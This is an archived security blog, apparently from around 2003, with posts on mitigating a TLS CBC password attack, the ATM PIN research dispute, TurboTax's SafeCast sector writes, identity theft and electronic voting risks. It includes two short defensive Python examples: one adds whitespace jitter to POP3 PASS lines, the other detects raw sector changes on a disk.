- Add random whitespace to the initial messages so the password isn't always at a fixed location (that is, sprinkle extra spaces and tabs and whatnot around in the lines you send up to and including the password).

-- Snip --

This changes the padding on each message containing the password, making the attack rather more difficult, and has the advantage that you don't need to convince the party running the server to update their software. Depending on how much stuff you can send per message, you can vary it by quite a bit. In the POP case the "PASS xxx" would be a single message so you don't have quite that much leeway, but it looks like you can add enough whitespace to make the padding random. Someone else on the list posted a followup to say he'd tried it on two servers and they had no trouble with the whitespace.

There is an excellent technical summary that I'll have to dig up and post later. It listed out all of the limitations that could mitigate your risk.
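Gutmann's second suggestion is easy to see in numbers. The following is an added example, not code from Gutmann, cryptlib or the EPFL paper: it builds POP3 `PASS` lines with random leading and inter-token whitespace, then works out where the password lands inside its CBC block and how much padding the TLS 1.0 record would get. It assumes a cipher suite with a 16-byte block and a 20-byte HMAC-SHA1 tag, the MAC-then-pad layout of TLS 1.0 records, and (as the quoted post reports) a server that tolerates the extra whitespace. The password value is a constructed placeholder.

```python
import random

BLOCK_SIZE = 16   # AES-CBC block size; the page's attack targets CBC suites
MAC_LEN = 20      # HMAC-SHA1 tag length in a TLS 1.0 record (assumed cipher suite)


def jitter_pop_command(keyword, argument, rng, max_pad=24):
    """Build a POP3 command line with a random amount of extra spaces and
    tabs before the keyword and between keyword and argument.

    Assumption (from the quoted post): the server ignores the extra
    whitespace. The password itself is not altered."""
    fill = " \t"
    lead = "".join(rng.choice(fill) for _ in range(rng.randint(0, max_pad)))
    gap = " " + "".join(rng.choice(fill) for _ in range(rng.randint(0, max_pad)))
    return f"{lead}{keyword}{gap}{argument}\r\n"


def record_layout(line):
    """(block index holding the last plaintext byte, CBC padding length)
    for one TLS 1.0 record carrying `line`: plaintext || MAC || padding,
    padded up to a block boundary, padding length 1..16."""
    plain_len = len(line.encode())
    pad_len = BLOCK_SIZE - ((plain_len + MAC_LEN) % BLOCK_SIZE)
    last_block = (plain_len - 1) // BLOCK_SIZE
    return last_block, pad_len


def secret_offset(line, secret):
    """Byte offset of the secret inside its CBC block (0..15)."""
    return line.encode().index(secret.encode()) % BLOCK_SIZE


def layout_variety(secret, samples, rng):
    """Distinct (last block, padding, secret offset) layouts observed across
    `samples` jittered PASS lines. A fixed line always yields one layout,
    which is exactly the repeated block the attack needs; jitter spreads it."""
    seen = set()
    for _ in range(samples):
        line = jitter_pop_command("PASS", secret, rng)
        seen.add(record_layout(line) + (secret_offset(line, secret),))
    return seen


if __name__ == "__main__":
    pw = "example-pw"                                  # constructed placeholder
    fixed = f"PASS {pw}\r\n"
    print("fixed line   :", record_layout(fixed), "offset", secret_offset(fixed, pw))
    variety = layout_variety(pw, 50, random.SystemRandom())
    print("jittered     :", len(variety), "distinct layouts in 50 connections")
```

Note the design choice: `jitter_pop_command` takes an explicit `rng` so a client can pass `random.SystemRandom()` in production while tests use a seeded `random.Random`; whitespace only ever goes before the keyword and between the tokens, so `line.split()` still yields exactly `["PASS", password]` for any server that tokenises on whitespace runs.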


Citibank is trying to prevent the disclosure of new scientific research that has apparently broken ATM PIN confidentiality protection wide open. This is even in the face of "phantom" charges appearing on people's accounts that banks refuse to reverse, claiming that their system is so secure that users cannot repudiate such charges.

"The card's issuer says that's not possible, because their ATM network is secure, and is suing the couple to recover the nearly $80,000 that was charged against the card."

The raw archived information:

Protocol Analysis, Composability and Computation

There is a slashdot discussion

There is an eWeek article too: Attack Exposes ATM Vulnerabilities

Well-known cryptographer Ross Anderson offered this testimony in the case:

""In addition to being published material, derived from open sources, and of crucial importance to the defendants' case, the vulnerabilities are likely to be crucially important in other cases brought in the U.K. and elsewhere over disputed ATM transactions," Anderson wrote in his letter. "Bond plans to incorporate much of this material into his Ph.D. thesis. It is spectacularly unfair for the applicant to ask you, in effect, to prohibit Bond from including in his thesis a scientific discovery that he has already published.""


A recent MIT study of 129 used hard drives indicated that people leave a treasure trove of data behind on their discarded computers.

This raises the question of how you can securely dispose of old hard drives. Well, the typical answers are to use a secure wiping program or degaussing, but these are not 100% effective.

Some people have come up with a foolproof method called Drive Slagging which involves melting down the platters and essentially creating aluminum ingots.

Not exactly do-it-yourself though :-)


DRM is getting even more annoying, dangerous, and insidious. Intuit thought that it would be necessary to utilize a product called SafeCast to prevent unauthorized copying of its popular TurboTax product. Extremetech did some testing and found that SafeCast copy (not copyright) protection relied on modifying sector 33 on your hard drive outside of your operating system. This is not necessarily a Good Thing ™

TurboTax Test Results Part II

What to do now? Should you use TurboTax or switch to a competitor's product? Well, Intuit has been listening to the complaints and has offered some concessions, including assurance that a version of TurboTax that won't require "activation" to utilize will be released after October 2003, allowing SafeCast to be uninstalled when TurboTax is uninstalled.

TurboTax: So What Do I Do Now?

Timeline of the problems and Intuit's response

Most interesting here was this note that "Analysts sharply question Intuit about TurboTax product activation." when they reported their quarterly results on February 13.
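A write outside the file system, like the sector 33 modification ExtremeTech found, is invisible to the operating system's file tools but easy to catch if you baseline the reserved area of the disk before installing software and compare afterwards. The following is an added example, not ExtremeTech's test code or anything from Intuit or SafeCast: it hashes each 512-byte sector of the first 64 sectors and reports which sector numbers changed between two snapshots. The image it diffs is a constructed all-zero stand-in with a marker written into sector 33; `read_sectors` shows how the same snapshot would be taken from a raw device, which needs administrator rights.

```python
import hashlib

SECTOR_SIZE = 512   # classic sector size; the article's "sector 33" counts in these


def read_sectors(path, first, count, sector_size=SECTOR_SIZE):
    """Read `count` sectors starting at sector `first` from a disk image or
    raw device (raw device access needs administrator rights)."""
    with open(path, "rb") as fh:
        fh.seek(first * sector_size)
        return fh.read(count * sector_size)


def sector_hashes(blob, first=0, sector_size=SECTOR_SIZE):
    """Map absolute sector number -> SHA-256 hex digest of that sector."""
    hashes = {}
    for i in range(0, len(blob), sector_size):
        sector_no = first + i // sector_size
        hashes[sector_no] = hashlib.sha256(blob[i:i + sector_size]).hexdigest()
    return hashes


def changed_sectors(baseline, current):
    """Sorted sector numbers whose content differs between two snapshots
    (a sector missing from `current` counts as changed)."""
    return sorted(n for n in baseline if current.get(n) != baseline[n])


def constructed_image(n_sectors=64, fill=b"\x00"):
    """Constructed stand-in for the first 64 sectors of a drive."""
    return fill * (n_sectors * SECTOR_SIZE)


def tamper_sector(blob, sector, payload, sector_size=SECTOR_SIZE):
    """Copy of `blob` with `payload` written at the start of `sector`,
    simulating a program writing to the disk outside the file system."""
    start = sector * sector_size
    return blob[:start] + payload + blob[start + len(payload):]


def demo():
    """Baseline the reserved area, simulate the write, report what moved."""
    before = constructed_image()
    after = tamper_sector(before, 33, b"CONSTRUCTED-MARKER")
    return changed_sectors(sector_hashes(before), sector_hashes(after))


if __name__ == "__main__":
    print("sectors changed:", demo())   # expect [33]
```

Keep the baseline hashes somewhere the installer cannot reach (a file on another machine, or simply printed); a changed sector list that is not empty after installing a product is exactly the behaviour the article is complaining about, and the sector numbers tell you where to look.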


There is an excellent article in BusinessWeek on what is supposed to be the fastest growing crime in the U.S.: identity theft. I agree that only radical reform will solve the problem. However, I always think that the solutions focus on symptoms of the problem (disclosure of customer identifying information) and not on the root cause of the problem (insufficient authentication (i.e. PROOF of identity) requirements by credit issuers). Your identifying information should not have to be secret. That is the mark of an insecure system.

The biggest problem with identity theft is the human element, though. Consumers really don't want the additional security that would prevent identity theft because of the additional hassle it would cause them. I hear all the time about people who get offended by having to show I.D. for financial transactions--even when it is explained why this is necessary. It must be that people are naturally trusting and to have someone challenge their authenticity is offensive. Perhaps it takes becoming the victim of identity theft to actually see that there are rational reasons to have better security...

I do like the idea of a market-driven solution. There are plenty of areas where the market fosters very poor security. Government mandates can change this tide and force novel approaches, like the one in this article.

BW Online | February 11, 2003 | To Thwart the Identity Thieves


Richard Forno was let go by Symantec, coincidentally right after he had politely complained in a letter about the extremely inefficient payment procedures they brought with them to SecurityFocus.

I really enjoyed his commentary so I hope to see him show up somewhere else soon!

symantec-bitch


The C4I.org - Computer Security and Intelligence website has, according to the author, "little nuggets" of information he finds "interesting enough to post online".

The most interesting thing that I found there (so far) is Tradesports.com where people are betting on current events, such as whether or not Saddam will still be in power as of March 31.

-Jason


The Senate Committee on National Security and Defence in Canada recently released a report on the new airport security measures.

It is entitled "The Myth of Security at Canada's Airports".

"...measures have reassured many travellers that security has been tightened at Canadian airports since the tragic events of September 11, 2001. The problem is that there has been little or no improvement to huge security gaps that persist behind the scenes in the Canadian travel industry. "

There is also a full-disclosure debate arising over whistle-blowers who may point out that money or effort is being misdirected:

"Our basic premise: You can be sure that ships really will sink if they have a lot of holes in them. And those holes aren't likely to get patched unless the public applies pressure to get the job done. They certainly aren't patched yet."

Security measures should be able to withstand scrutiny.

Fifth Report: The Myth of Security at Canada's Airports


Declan McCullagh asks a good question on the cryptography list:

When encryption is omnipresent in everything from wireless networks to hard drives to SSH clients, might the basic effect of such a law [Patriot 2] be to boost potential maximum prison terms by five years?

It is a terrible idea to presume that using encryption is an aggravating circumstance. "Why are you using encryption? You must have something to hide..."

Original SAFE Act: http://thomas.loc.gov/cgi-bin/bdquery/z?d105:h.r.00695:
Leaked new Patriot Act 2 draft: http://www.privacy.org/patriot2draft.pdf


"Human rights watchdog Privacy International has launched a quest to find the World's Most Stupid Security Measure."

http://www.theregister.co.uk/content/55/29279.html

There were some preliminary examples in discussion on the cryptography mailing list.

"The most important question to ask is this:

With respect to this year's all-electronic voting machines, is there any meaningful evidence that the vote you cast was correctly recorded -- that is, evidence that there were no misconfigured systems, accidents, internal fraud, etc.? For almost all of the existing systems (with the exception of one that actually incorporates the Mercuri Mechanism, namely, Avante), the answer is an UNEQUIVOCAL NO. This is an untenable situation if you believe in election integrity, IRRESPECTIVE of your party affiliations."

-- Peter G. Neumann

Electronic voting is very, very dangerous. Don't even get me started on Internet voting. There is only one known product on the marketplace whose makers have done their homework and implemented the mechanism for ensuring election integrity that the research community has identified as correct (the Mercuri Mechanism, above).

There are tons of published cases of errors and delays caused by electronic voting as it has actually been run around the country, including more votes being counted than there were registered voters in the precinct.

Here is one list: http://www.csl.sri.com/neumann/illustrative.html#24
And another: http://www.csl.sri.com/users/neumann/book-voting.html

Washington State is even looking at Internet Voting: http://www.secstate.wa.gov/elections/evoting_paper.aspx

I heard and saw Sam Reed talking about an Electronic Voting pilot in Washington State on the news. Here's a press release: http://www.secstate.wa.gov/office/news.aspx?news_id=150

This is an area that fascinates me because of all of the research that public officials ignore on the dangers and on how to do this correctly. They often give way too much credence to vendors who tell them all is safe. I would love to ask the people doing these pilots how they plan to assure voters of the integrity of the election, especially when e-voting machines are often closed-source and cannot be reverse-engineered because the companies claim trade secrets and will probably sic the DMCA on you.

When I get some time, I need to write some letters to representatives in this state. I will include these folks:

Sam Reed, Secretary of State
Dean Logan, Director of Elections (elections@secstate.wa.gov)
David M. Elliott, Assistant Director of Elections

To find the representatives in your district, check out http://dfind.leg.wa.gov/dfinder.cfm

In the meantime, there is a petition that you can sign up with:

http://verify.stanford.edu/evote.html

A ton of big-name researchers and security experts have already signed it.

And two renowned experts in electronic voting:

Rebecca Mercuri, Ph.D. http://www.notablesoftware.com/evote.html (has been researching this for over a decade). Her position statement: http://www.notablesoftware.com/RMstatement.html

Peter G. Neumann (moderator of the ACM Risks Forum): http://www.csl.sri.com/users/neumann/ and a paper at http://www.csl.sri.com/users/neumann/ncs93.html
His excellent summary of the issue: http://www.interesting-people.org/archives/interesting-people/200211/msg00090.html

Avi Rubin has also written a paper on this topic: http://avirubin.com/e-voting.security.html

NPR also just ran a segment on the risks of electronic voting during Morning Edition Feb 10, 2003



Contact: Jason Axley

Powered by Movable Type 4.1